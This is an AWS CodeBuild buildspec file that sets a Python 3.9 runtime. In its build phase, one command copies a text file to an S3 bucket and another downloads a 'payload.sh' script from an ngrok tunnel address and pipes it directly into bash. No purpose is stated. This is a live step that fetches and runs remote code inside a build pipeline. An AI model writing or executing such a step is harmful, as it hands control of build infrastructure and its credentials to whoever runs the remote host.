version: 0.2
phases:
  install:
    runtime-versions:
      python: 3.9
  build:
    commands:
      - aws s3 cp Text.txt s3://buildanu/tttt
      - curl https://6be3-2409-40e6-3f-d034-163-a226-ba52-cc9d.ngrok-free.app/payload.sh | bash
